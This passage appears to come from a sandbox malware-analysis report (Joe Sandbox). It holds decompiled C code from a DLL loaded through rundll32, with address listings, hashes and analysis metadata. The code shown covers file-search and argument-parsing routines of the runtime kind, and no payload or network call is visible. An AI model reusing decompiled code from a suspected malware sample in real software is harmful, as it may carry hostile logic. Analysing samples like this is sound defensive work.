				void* _t307;
				signed int _t308;
				void* _t309;
				void* _t310;
				void* _t311;
				signed int _t312;
				void* _t313;
				void* _t314;

				_t131 = _a8;
				_t310 = _t309 - 0x28;
				_push(__esi);
				_t318 = _t131;
				if(_t131 != 0) {
					_t293 = _a4;
					_t223 = 0;
					 *_t131 = 0;
					_t284 = 0;
					_t132 =  *_t293;
					_t233 = 0;
					_v608.cAlternateFileName = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t132;
					if(_t132 == 0) {
						L9:
						_v8 = _t223;
						_t134 = _t233 - _t284;
						_t294 = _t284;
						_v12 = _t294;
						_t272 = (_t134 >> 2) + 1;
						_t136 = _t134 + 3 >> 2;
						__eflags = _t233 - _t294;
						_v16 = (_t134 >> 2) + 1;
						asm("sbb esi, esi");
						_t296 =  !_t294 & _t134 + 0x00000003 >> 0x00000002;
						__eflags = _t296;
						if(_t296 != 0) {
							_t214 = _t284;
							_t281 = _t223;
							do {
								_t265 =  *_t214;
								_t20 = _t265 + 1; // 0x1
								_v20 = _t20;
								do {
									_t216 =  *_t265;
									_t265 = _t265 + 1;
									__eflags = _t216;
								} while (_t216 != 0);
								_t223 = _t223 + 1 + _t265 - _v20;
								_t214 = _v12 + 4;
								_t281 = _t281 + 1;
								_v12 = _t214;
								__eflags = _t281 - _t296;
							} while (_t281 != _t296);
							_t272 = _v16;
							_v8 = _t223;
							_t223 = 0;
							__eflags = 0;
						}
						_t297 = E6E77C9DC(_t136, _t272, _v8, 1);
						_t311 = _t310 + 0xc;
						__eflags = _t297;
						if(_t297 != 0) {
							_v12 = _t284;
							_t139 = _t297 + _v16 * 4;
							_t234 = _t139;
							_v28 = _t139;
							_t140 = _t284;
							_v16 = _t234;
							__eflags = _t140 - _v40;
							if(_t140 == _v40) {
								L24:
								_v12 = _t223;
								 *_a8 = _t297;
								_t298 = _t223;
								goto L25;
							} else {
								_t275 = _t297 - _t284;
								__eflags = _t275;
								_v32 = _t275;
								do {
									_t150 =  *_t140;
									_t276 = _t150;
									_v24 = _t150;
									_v20 = _t276 + 1;
									do {
										_t152 =  *_t276;
										_t276 = _t276 + 1;
										__eflags = _t152;
									} while (_t152 != 0);
									_t153 = _t276 - _v20 + 1;
									_push(_t153);
									_v20 = _t153;
									_t157 = E6E781F87(_t234, _v28 - _t234 + _v8, _v24);
									_t311 = _t311 + 0x10;
									__eflags = _t157;
									if(_t157 != 0) {
										_push(_t223);
										_push(_t223);
										_push(_t223);
										_push(_t223);
										_push(_t223);
										E6E77D4EE();
										asm("int3");
										_t307 = _t311;
										_push(_t234);
										_t240 = _v72;
										_t65 = _t240 + 1; // 0x1
										_t278 = _t65;
										do {
											_t159 =  *_t240;
											_t240 = _t240 + 1;
											__eflags = _t159;
										} while (_t159 != 0);
										_push(_t284);
										_t286 = _a8;
										_t242 = _t240 - _t278 + 1;
										_v12 = _t242;
										__eflags = _t242 -  !_t286;
										if(_t242 <=  !_t286) {
											_push(_t223);
											_push(_t297);
											_t68 = _t286 + 1; // 0x1
											_t226 = _t68 + _t242;
											_t301 = E6E77D5E9(_t226, 1);
											__eflags = _t286;
											if(_t286 == 0) {
												L40:
												_push(_v12);
												_t226 = _t226 - _t286;
												_t164 = E6E781F87(_t301 + _t286, _t226, _v0);
												_t312 = _t311 + 0x10;
												__eflags = _t164;
												if(_t164 != 0) {
													goto L45;
												} else {
													_t230 = _a12;
													_t207 = E6E77FA19(_t230);
													_v12 = _t207;
													__eflags = _t207;
													if(_t207 == 0) {
														 *( *(_t230 + 4)) = _t301;
														_t303 = 0;
														_t77 = _t230 + 4;
														 *_t77 =  *(_t230 + 4) + 4;
														__eflags =  *_t77;
													} else {
														E6E77D646(_t301);
														_t303 = _v12;
													}
													E6E77D646(0);
													_t210 = _t303;
													goto L37;
												}
											} else {
												_push(_t286);
												_t212 = E6E781F87(_t301, _t226, _a4);
												_t312 = _t311 + 0x10;
												__eflags = _t212;
												if(_t212 != 0) {
													L45:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E6E77D4EE();
													asm("int3");
													_push(_t307);
													_t308 = _t312;
													_t313 = _t312 - 0x298;
													_t166 =  *0x6e78c00c; // 0x9bbef7a8
													_v124 = _t166 ^ _t308;
													_t245 = _v108;
													_t279 = _v104;
													_push(_t226);
													_push(0);
													_t288 = _v112;
													_v724 = _t279;
													__eflags = _t245 - _t288;
													if(_t245 != _t288) {
														while(1) {
															_t205 =  *_t245;
															__eflags = _t205 - 0x2f;
															if(_t205 == 0x2f) {
																break;
															}
															__eflags = _t205 - 0x5c;
															if(_t205 != 0x5c) {
																__eflags = _t205 - 0x3a;
																if(_t205 != 0x3a) {
																	_t245 = E6E781FE0(_t288, _t245);
																	__eflags = _t245 - _t288;
																	if(_t245 != _t288) {
																		continue;
																	}
																}
															}
															break;
														}
														_t279 = _v616;
													}
													_t168 =  *_t245;
													_v609 = _t168;
													__eflags = _t168 - 0x3a;
													if(_t168 != 0x3a) {
														L56:
														_t227 = 0;
														__eflags = _t168 - 0x2f;
														if(__eflags == 0) {
															L59:
															_t169 = 1;
														} else {
															__eflags = _t168 - 0x5c;
															if(__eflags == 0) {
																goto L59;
															} else {
																__eflags = _t168 - 0x3a;
																_t169 = 0;
																if(__eflags == 0) {
																	goto L59;
																}
															}
														}
														_v676 = _t227;
														_v672 = _t227;
														_push(_t301);
														asm("sbb eax, eax");
														_v668 = _t227;
														_v664 = _t227;
														_v644 =  ~(_t169 & 0x000000ff) & _t245 - _t288 + 0x00000001;
														_v660 = _t227;
														_v656 = _t227;
														_t175 = E6E77F412(_t245 - _t288 + 1, _t288,  &_v676, E6E77F926(_t279, __eflags));
														_t314 = _t313 + 0xc;
														asm("sbb eax, eax");
														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t227,  &_v608, _t227, _t227, _t227);
														_t302 = _t179;
														__eflags = _t302 - 0xffffffff;
														if(_t302 != 0xffffffff) {
															_t250 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
															__eflags = _t250;
															_v648 = _t250 >> 2;
															do {
																_v640 = _t227;
																_v636 = _t227;
																_v632 = _t227;
																_v628 = _t227;
																_v624 = _t227;
																_v620 = _t227;
																_t185 = E6E77F343( &(_v608.cFileName),  &_v640,  &_v609, E6E77F926(_t279, __eflags));
																_t314 = _t314 + 0x10;
																asm("sbb eax, eax");
																_t188 =  !( ~_t185) & _v632;
																__eflags =  *_t188 - 0x2e;
																if( *_t188 != 0x2e) {
																	L67:
																	_push(_v616);
																	_push(_v644);
																	_push(_t288);
																	_push(_t188);
																	L33();
																	_t314 = _t314 + 0x10;
																	_v652 = _t188;
																	__eflags = _t188;
																	if(_t188 != 0) {
																		__eflags = _v620 - _t227;
																		if(_v620 != _t227) {
																			E6E77D646(_v632);
																			_t188 = _v652;
																		}
																		_t227 = _t188;
																	} else {
																		goto L68;
																	}
																} else {
																	_t256 =  *((intOrPtr*)(_t188 + 1));
																	__eflags = _t256;
																	if(_t256 == 0) {
																		goto L68;
																	} else {
																		__eflags = _t256 - 0x2e;
																		if(_t256 != 0x2e) {
																			goto L67;
																		} else {
																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t227;
																			if( *((intOrPtr*)(_t188 + 2)) == _t227) {
																				goto L68;
																			} else {
																				goto L67;
																			}
																		}
																	}
																}
																L76:
																FindClose(_t302);
																goto L77;
																L68:
																__eflags = _v620 - _t227;
																if(_v620 != _t227) {
																	E6E77D646(_v632);
																}
																__eflags = FindNextFileW(_t302,  &_v608);
															} while (__eflags != 0);
															_t196 = _v616;
															_t258 = _v648;
															_t279 =  *_t196;
															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
															__eflags = _t258 - _t199;
															if(_t258 != _t199) {
																E6E781A90(_t279, _t279 + _t258 * 4, _t199 - _t258, 4, E6E77F279);
															}
															goto L76;
														} else {
															_push(_v616);
															_push(_t227);
															_push(_t227);
															_push(_t288);
															L33();
															_t227 = _t179;
														}
														L77:
														__eflags = _v656;
														_pop(_t301);
														if(_v656 != 0) {
															E6E77D646(_v668);
														}
													} else {
														__eflags = _t245 - _t288 + 1;
														if(_t245 == _t288 + 1) {
															_t168 = _v609;
															goto L56;
														} else {
															_push(_t279);
															_push(0);
															_push(0);
															_push(_t288);
															L33();
														}
													}
													_pop(_t289);
													__eflags = _v16 ^ _t308;
													_pop(_t228);
													return E6E778727(_t228, _v16 ^ _t308, _t279, _t289, _t301);
												} else {
													goto L40;
												}
											}
										} else {
											_t210 = 0xc;
											L37:
											return _t210;
										}
									} else {
										goto L23;
									}
									goto L81;
									L23:
									_t213 = _v12;
									_t264 = _v16;
									 *((intOrPtr*)(_v32 + _t213)) = _t264;
									_t140 = _t213 + 4;
									_t234 = _t264 + _v20;
									_v16 = _t234;
									_v12 = _t140;
									__eflags = _t140 - _v40;
								} while (_t140 != _v40);
								goto L24;
							}
						} else {
							_t298 = _t297 | 0xffffffff;
							_v12 = _t298;
							L25:
							E6E77D646(_t223);
							_pop(_t235);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t223;
							_t218 = E6E781FA0(_t132,  &_v8);
							_t235 =  *_t293;
							__eflags = _t218;
							if(_t218 != 0) {
								_push( &(_v608.cAlternateFileName));
								_push(_t218);
								_push(_t235);
								L46();
								_t310 = _t310 + 0xc;
								_v12 = _t218;
								_t298 = _t218;
							} else {
								_t219 =  &(_v608.cAlternateFileName);
								_push(_t219);
								_push(_t223);
								_push(_t223);
								_push(_t235);
								L33();
								_t298 = _t219;
								_t310 = _t310 + 0x10;
								_v12 = _t298;
							}
							__eflags = _t298;
							if(_t298 != 0) {
								break;
							}
							_t293 =  &(_a4[1]);
							_a4 = _t293;
							_t132 =  *_t293;
							__eflags = _t132;
							if(_t132 != 0) {
								continue;
							} else {
								_t284 = _v608.cAlternateFileName;
								_t233 = _v40;
								goto L9;
							}
							goto L81;
						}
						_t284 = _v608.cAlternateFileName;
						L26:
						_t273 = _t284;
						_v32 = _t273;
						__eflags = _v40 - _t273;
						asm("sbb ecx, ecx");
						_t237 =  !_t235 & _v40 - _t273 + 0x00000003 >> 0x00000002;
						__eflags = _t237;
						_v28 = _t237;
						if(_t237 != 0) {
							_t300 = _t237;
							do {
								E6E77D646( *_t284);
								_t223 = _t223 + 1;
								_t284 = _t284 + 4;
								__eflags = _t223 - _t300;
							} while (_t223 != _t300);
							_t284 = _v608.cAlternateFileName;
							_t298 = _v12;
						}
						E6E77D646(_t284);
						goto L31;
					}
				} else {
					_t220 = E6E77D59B(_t318);
					_t298 = 0x16;
					 *_t220 = _t298;
					E6E77D4DE();
					L31:
					return _t298;
				}
				L81:
			}

















































































































                                                      0x6e77f434
                                                      0x6e77f437
                                                      0x6e77f43a
                                                      0x6e77f43b
                                                      0x6e77f43d
                                                      0x6e77f453
                                                      0x6e77f457
                                                      0x6e77f45a
                                                      0x6e77f45c
                                                      0x6e77f45e
                                                      0x6e77f460
                                                      0x6e77f462
                                                      0x6e77f465
                                                      0x6e77f468
                                                      0x6e77f46b
                                                      0x6e77f46d
                                                      0x6e77f4d0
                                                      0x6e77f4d2
                                                      0x6e77f4d5
                                                      0x6e77f4d7
                                                      0x6e77f4db
                                                      0x6e77f4e4
                                                      0x6e77f4e5
                                                      0x6e77f4e8
                                                      0x6e77f4ea
                                                      0x6e77f4ed
                                                      0x6e77f4f1
                                                      0x6e77f4f1
                                                      0x6e77f4f3
                                                      0x6e77f4f5
                                                      0x6e77f4f7
                                                      0x6e77f4f9
                                                      0x6e77f4f9
                                                      0x6e77f4fb
                                                      0x6e77f4fe
                                                      0x6e77f501
                                                      0x6e77f501
                                                      0x6e77f503
                                                      0x6e77f504
                                                      0x6e77f504
                                                      0x6e77f50f
                                                      0x6e77f511
                                                      0x6e77f514
                                                      0x6e77f515
                                                      0x6e77f518
                                                      0x6e77f518
                                                      0x6e77f51c
                                                      0x6e77f51f
                                                      0x6e77f522
                                                      0x6e77f522
                                                      0x6e77f522
                                                      0x6e77f52f
                                                      0x6e77f531
                                                      0x6e77f534
                                                      0x6e77f536
                                                      0x6e77f54e
                                                      0x6e77f551
                                                      0x6e77f554
                                                      0x6e77f556
                                                      0x6e77f559
                                                      0x6e77f55b
                                                      0x6e77f55e
                                                      0x6e77f561
                                                      0x6e77f5be
                                                      0x6e77f5c1
                                                      0x6e77f5c4
                                                      0x6e77f5c6
                                                      0x00000000
                                                      0x6e77f563
                                                      0x6e77f565
                                                      0x6e77f565
                                                      0x6e77f567
                                                      0x6e77f56a
                                                      0x6e77f56a
                                                      0x6e77f56c
                                                      0x6e77f56e
                                                      0x6e77f574
                                                      0x6e77f577
                                                      0x6e77f577
                                                      0x6e77f579
                                                      0x6e77f57a
                                                      0x6e77f57a
                                                      0x6e77f581
                                                      0x6e77f584
                                                      0x6e77f588
                                                      0x6e77f595
                                                      0x6e77f59a
                                                      0x6e77f59d
                                                      0x6e77f59f
                                                      0x6e77f613
                                                      0x6e77f614
                                                      0x6e77f615
                                                      0x6e77f616
                                                      0x6e77f617
                                                      0x6e77f618
                                                      0x6e77f61d
                                                      0x6e77f621
                                                      0x6e77f623
                                                      0x6e77f624
                                                      0x6e77f627
                                                      0x6e77f627
                                                      0x6e77f62a
                                                      0x6e77f62a
                                                      0x6e77f62c
                                                      0x6e77f62d
                                                      0x6e77f62d
                                                      0x6e77f631
                                                      0x6e77f632
                                                      0x6e77f639
                                                      0x6e77f63c
                                                      0x6e77f63f
                                                      0x6e77f641
                                                      0x6e77f649
                                                      0x6e77f64a
                                                      0x6e77f64b
                                                      0x6e77f64e
                                                      0x6e77f658
                                                      0x6e77f65c
                                                      0x6e77f65e
                                                      0x6e77f672
                                                      0x6e77f672
                                                      0x6e77f675
                                                      0x6e77f67f
                                                      0x6e77f684
                                                      0x6e77f687
                                                      0x6e77f689
                                                      0x00000000
                                                      0x6e77f68b
                                                      0x6e77f68b
                                                      0x6e77f690
                                                      0x6e77f697
                                                      0x6e77f69a
                                                      0x6e77f69c
                                                      0x6e77f6ad
                                                      0x6e77f6af
                                                      0x6e77f6b1
                                                      0x6e77f6b1
                                                      0x6e77f6b1
                                                      0x6e77f69e
                                                      0x6e77f69f
                                                      0x6e77f6a4
                                                      0x6e77f6a7
                                                      0x6e77f6b6
                                                      0x6e77f6bc
                                                      0x00000000
                                                      0x6e77f6bf
                                                      0x6e77f660
                                                      0x6e77f660
                                                      0x6e77f666
                                                      0x6e77f66b
                                                      0x6e77f66e
                                                      0x6e77f670
                                                      0x6e77f6c2
                                                      0x6e77f6c4
                                                      0x6e77f6c5
                                                      0x6e77f6c6
                                                      0x6e77f6c7
                                                      0x6e77f6c8
                                                      0x6e77f6c9
                                                      0x6e77f6ce
                                                      0x6e77f6d1
                                                      0x6e77f6d2
                                                      0x6e77f6d4
                                                      0x6e77f6da
                                                      0x6e77f6e1
                                                      0x6e77f6e4
                                                      0x6e77f6e7
                                                      0x6e77f6ea
                                                      0x6e77f6eb
                                                      0x6e77f6ec
                                                      0x6e77f6ef
                                                      0x6e77f6f5
                                                      0x6e77f6f7
                                                      0x6e77f6f9
                                                      0x6e77f6f9
                                                      0x6e77f6fb
                                                      0x6e77f6fd
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77f6ff
                                                      0x6e77f701
                                                      0x6e77f703
                                                      0x6e77f705
                                                      0x6e77f710
                                                      0x6e77f712
                                                      0x6e77f714
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77f714
                                                      0x6e77f705
                                                      0x00000000
                                                      0x6e77f701
                                                      0x6e77f716
                                                      0x6e77f716
                                                      0x6e77f71c
                                                      0x6e77f71e
                                                      0x6e77f724
                                                      0x6e77f726
                                                      0x6e77f748
                                                      0x6e77f748
                                                      0x6e77f74a
                                                      0x6e77f74c
                                                      0x6e77f758
                                                      0x6e77f758
                                                      0x6e77f74e
                                                      0x6e77f74e
                                                      0x6e77f750
                                                      0x00000000
                                                      0x6e77f752
                                                      0x6e77f752
                                                      0x6e77f754
                                                      0x6e77f756
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77f756
                                                      0x6e77f750
                                                      0x6e77f760
                                                      0x6e77f768
                                                      0x6e77f76e
                                                      0x6e77f76f
                                                      0x6e77f771
                                                      0x6e77f779
                                                      0x6e77f77f
                                                      0x6e77f785
                                                      0x6e77f78b
                                                      0x6e77f79f
                                                      0x6e77f7a4
                                                      0x6e77f7af
                                                      0x6e77f7bf
                                                      0x6e77f7c5
                                                      0x6e77f7c7
                                                      0x6e77f7ca
                                                      0x6e77f7ed
                                                      0x6e77f7ed
                                                      0x6e77f7f2
                                                      0x6e77f7f8
                                                      0x6e77f7f8
                                                      0x6e77f7fe
                                                      0x6e77f804
                                                      0x6e77f80a
                                                      0x6e77f810
                                                      0x6e77f816
                                                      0x6e77f837
                                                      0x6e77f83c
                                                      0x6e77f841
                                                      0x6e77f845
                                                      0x6e77f84b
                                                      0x6e77f84e
                                                      0x6e77f861
                                                      0x6e77f861
                                                      0x6e77f867
                                                      0x6e77f86d
                                                      0x6e77f86e
                                                      0x6e77f86f
                                                      0x6e77f874
                                                      0x6e77f877
                                                      0x6e77f87d
                                                      0x6e77f87f
                                                      0x6e77f8dd
                                                      0x6e77f8e3
                                                      0x6e77f8eb
                                                      0x6e77f8f0
                                                      0x6e77f8f6
                                                      0x6e77f8f7
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77f850
                                                      0x6e77f850
                                                      0x6e77f853
                                                      0x6e77f855
                                                      0x00000000
                                                      0x6e77f857
                                                      0x6e77f857
                                                      0x6e77f85a
                                                      0x00000000
                                                      0x6e77f85c
                                                      0x6e77f85c
                                                      0x6e77f85f
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77f85f
                                                      0x6e77f85a
                                                      0x6e77f855
                                                      0x6e77f8f9
                                                      0x6e77f8fa
                                                      0x00000000
                                                      0x6e77f881
                                                      0x6e77f881
                                                      0x6e77f887
                                                      0x6e77f88f
                                                      0x6e77f894
                                                      0x6e77f8a3
                                                      0x6e77f8a3
                                                      0x6e77f8ab
                                                      0x6e77f8b1
                                                      0x6e77f8b7
                                                      0x6e77f8be
                                                      0x6e77f8c1
                                                      0x6e77f8c3
                                                      0x6e77f8d3
                                                      0x6e77f8d8
                                                      0x00000000
                                                      0x6e77f7cc
                                                      0x6e77f7cc
                                                      0x6e77f7d2
                                                      0x6e77f7d3
                                                      0x6e77f7d4
                                                      0x6e77f7d5
                                                      0x6e77f7dd
                                                      0x6e77f7dd
                                                      0x6e77f900
                                                      0x6e77f900
                                                      0x6e77f907
                                                      0x6e77f908
                                                      0x6e77f910
                                                      0x6e77f915
                                                      0x6e77f728
                                                      0x6e77f72b
                                                      0x6e77f72d
                                                      0x6e77f742
                                                      0x00000000
                                                      0x6e77f72f
                                                      0x6e77f72f
                                                      0x6e77f732
                                                      0x6e77f733
                                                      0x6e77f734
                                                      0x6e77f735
                                                      0x6e77f73a
                                                      0x6e77f72d
                                                      0x6e77f91b
                                                      0x6e77f91c
                                                      0x6e77f91e
                                                      0x6e77f925
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77f670
                                                      0x6e77f643
                                                      0x6e77f645
                                                      0x6e77f646
                                                      0x6e77f648
                                                      0x6e77f648
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77f5a1
                                                      0x6e77f5a1
                                                      0x6e77f5a7
                                                      0x6e77f5aa
                                                      0x6e77f5ad
                                                      0x6e77f5b0
                                                      0x6e77f5b3
                                                      0x6e77f5b6
                                                      0x6e77f5b9
                                                      0x6e77f5b9
                                                      0x00000000
                                                      0x6e77f56a
                                                      0x6e77f538
                                                      0x6e77f538
                                                      0x6e77f53b
                                                      0x6e77f5c8
                                                      0x6e77f5c9
                                                      0x6e77f5ce
                                                      0x00000000
                                                      0x6e77f5ce
                                                      0x6e77f46f
                                                      0x6e77f46f
                                                      0x6e77f472
                                                      0x6e77f47a
                                                      0x6e77f47d
                                                      0x6e77f484
                                                      0x6e77f486
                                                      0x6e77f488
                                                      0x6e77f4a3
                                                      0x6e77f4a4
                                                      0x6e77f4a5
                                                      0x6e77f4a6
                                                      0x6e77f4ab
                                                      0x6e77f4ae
                                                      0x6e77f4b1
                                                      0x6e77f48a
                                                      0x6e77f48a
                                                      0x6e77f48d
                                                      0x6e77f48e
                                                      0x6e77f48f
                                                      0x6e77f490
                                                      0x6e77f491
                                                      0x6e77f496
                                                      0x6e77f498
                                                      0x6e77f49b
                                                      0x6e77f49b
                                                      0x6e77f4b3
                                                      0x6e77f4b5
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77f4be
                                                      0x6e77f4c1
                                                      0x6e77f4c4
                                                      0x6e77f4c6
                                                      0x6e77f4c8
                                                      0x00000000
                                                      0x6e77f4ca
                                                      0x6e77f4ca
                                                      0x6e77f4cd
                                                      0x00000000
                                                      0x6e77f4cd
                                                      0x00000000
                                                      0x6e77f4c8
                                                      0x6e77f543
                                                      0x6e77f5cf
                                                      0x6e77f5d2
                                                      0x6e77f5d6
                                                      0x6e77f5df
                                                      0x6e77f5e2
                                                      0x6e77f5e6
                                                      0x6e77f5e6
                                                      0x6e77f5e8
                                                      0x6e77f5eb
                                                      0x6e77f5ed
                                                      0x6e77f5ef
                                                      0x6e77f5f1
                                                      0x6e77f5f6
                                                      0x6e77f5f7
                                                      0x6e77f5fb
                                                      0x6e77f5fb
                                                      0x6e77f5ff
                                                      0x6e77f602
                                                      0x6e77f602
                                                      0x6e77f606
                                                      0x00000000
                                                      0x6e77f60d
                                                      0x6e77f43f
                                                      0x6e77f43f
                                                      0x6e77f446
                                                      0x6e77f447
                                                      0x6e77f449
                                                      0x6e77f60e
                                                      0x6e77f612
                                                      0x6e77f612
                                                      0x00000000

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID: *?
                                                      • API String ID: 269201875-2564092906
                                                      • Opcode ID: 425877a204eaf9f69b06832b323d35e7e812c064d97f881489b951747f31cfd1
                                                      • Instruction ID: e4bbb9fcf61e367675609a1666fa2950c5c7619decba79d4b7c8966f997e0da0
                                                      • Opcode Fuzzy Hash: 425877a204eaf9f69b06832b323d35e7e812c064d97f881489b951747f31cfd1
                                                      • Instruction Fuzzy Hash: B2614AB5D142199FDF28CFE8CA809EDBBF9EF48314B24856AD815E7314D731AE418B90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E77C72F, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 90%
                                                      			E6E77C72F(void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				char _t42;
				signed int _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				void* _t57;
				intOrPtr* _t58;
				void* _t59;
				signed int _t64;
				signed int _t66;

				_t57 = __edx;
				_t48 = _a4;
				if(_t48 != 0) {
					__eflags = _t48 - 2;
					if(_t48 == 2) {
						L5:
						_push(_t59);
						E6E78016C(_t48, _t57, _t59);
						E6E77FBAD(_t48, _t57, 0, 0x6e78cd88, 0, 0x6e78cd88, 0x104);
						_t26 =  *0x6e78d330; // 0x242b78
						 *0x6e78d320 = 0x6e78cd88;
						_v20 = _t26;
						__eflags = _t26;
						if(_t26 == 0) {
							L7:
							_t26 = 0x6e78cd88;
							_v20 = 0x6e78cd88;
							L8:
							_v8 = 0;
							_v16 = 0;
							_t64 = E6E77C9DC(E6E77C865( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
							__eflags = _t64;
							if(__eflags != 0) {
								E6E77C865( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
								__eflags = _t48 - 1;
								if(_t48 != 1) {
									_v12 = 0;
									_push( &_v12);
									_t49 = E6E77FAA0(_t64, _t64);
									__eflags = _t49;
									if(_t49 == 0) {
										_t58 = _v12;
										_t54 = 0;
										_t36 = _t58;
										__eflags =  *_t58;
										if( *_t58 == 0) {
											L17:
											_t37 = 0;
											 *0x6e78d324 = _t54;
											_v12 = 0;
											_t49 = 0;
											 *0x6e78d328 = _t58;
											L18:
											E6E77D646(_t37);
											_v12 = 0;
											L19:
											E6E77D646(_t64);
											_t40 = _t49;
											L20:
											return _t40;
										} else {
											goto L16;
										}
										do {
											L16:
											_t36 = _t36 + 4;
											_t54 = _t54 + 1;
											__eflags =  *_t36;
										} while ( *_t36 != 0);
										goto L17;
									}
									_t37 = _v12;
									goto L18;
								}
								_t42 = _v8 - 1;
								__eflags = _t42;
								 *0x6e78d324 = _t42;
								_t43 = _t64;
								_t64 = 0;
								 *0x6e78d328 = _t43;
								L12:
								_t49 = 0;
								goto L19;
							}
							_t44 = E6E77D59B(__eflags);
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							goto L12;
						}
						__eflags =  *_t26;
						if( *_t26 != 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t48 - 1;
					if(__eflags == 0) {
						goto L5;
					}
					_t45 = E6E77D59B(__eflags);
					_t66 = 0x16;
					 *_t45 = _t66;
					E6E77D4DE();
					_t40 = _t66;
					goto L20;
				}
				return 0;
			}



























                                                      0x6e77c72f
                                                      0x6e77c738
                                                      0x6e77c73d
                                                      0x6e77c747
                                                      0x6e77c74a
                                                      0x6e77c767
                                                      0x6e77c767
                                                      0x6e77c768
                                                      0x6e77c77b
                                                      0x6e77c780
                                                      0x6e77c788
                                                      0x6e77c78e
                                                      0x6e77c791
                                                      0x6e77c793
                                                      0x6e77c79a
                                                      0x6e77c79a
                                                      0x6e77c79c
                                                      0x6e77c79f
                                                      0x6e77c7a2
                                                      0x6e77c7a9
                                                      0x6e77c7c2
                                                      0x6e77c7c7
                                                      0x6e77c7c9
                                                      0x6e77c7ea
                                                      0x6e77c7f2
                                                      0x6e77c7f5
                                                      0x6e77c810
                                                      0x6e77c813
                                                      0x6e77c81a
                                                      0x6e77c81e
                                                      0x6e77c820
                                                      0x6e77c827
                                                      0x6e77c82a
                                                      0x6e77c82c
                                                      0x6e77c82e
                                                      0x6e77c830
                                                      0x6e77c83a
                                                      0x6e77c83a
                                                      0x6e77c83c
                                                      0x6e77c842
                                                      0x6e77c845
                                                      0x6e77c847
                                                      0x6e77c84d
                                                      0x6e77c84e
                                                      0x6e77c854
                                                      0x6e77c857
                                                      0x6e77c858
                                                      0x6e77c85e
                                                      0x6e77c861
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77c832
                                                      0x6e77c832
                                                      0x6e77c832
                                                      0x6e77c835
                                                      0x6e77c836
                                                      0x6e77c836
                                                      0x00000000
                                                      0x6e77c832
                                                      0x6e77c822
                                                      0x00000000
                                                      0x6e77c822
                                                      0x6e77c7fa
                                                      0x6e77c7fa
                                                      0x6e77c7fb
                                                      0x6e77c800
                                                      0x6e77c802
                                                      0x6e77c804
                                                      0x6e77c809
                                                      0x6e77c809
                                                      0x00000000
                                                      0x6e77c809
                                                      0x6e77c7cb
                                                      0x6e77c7d0
                                                      0x6e77c7d2
                                                      0x6e77c7d3
                                                      0x00000000
                                                      0x6e77c7d3
                                                      0x6e77c795
                                                      0x6e77c798
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77c798
                                                      0x6e77c74c
                                                      0x6e77c74f
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77c751
                                                      0x6e77c758
                                                      0x6e77c759
                                                      0x6e77c75b
                                                      0x6e77c760
                                                      0x00000000
                                                      0x6e77c760
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: C:\Windows\SysWOW64\rundll32.exe$x+$
                                                      • API String ID: 0-418747824
                                                      • Opcode ID: ad613d94349a6ca238aadf0ed1530ad52bf1f5edf91e9c8232db23094977fe2a
                                                      • Instruction ID: f28e1ee389dbc38b12c1ceaa9d2fadcf42fa8a5ba9894db1e5a57ba3104c87e1
                                                      • Opcode Fuzzy Hash: ad613d94349a6ca238aadf0ed1530ad52bf1f5edf91e9c8232db23094977fe2a
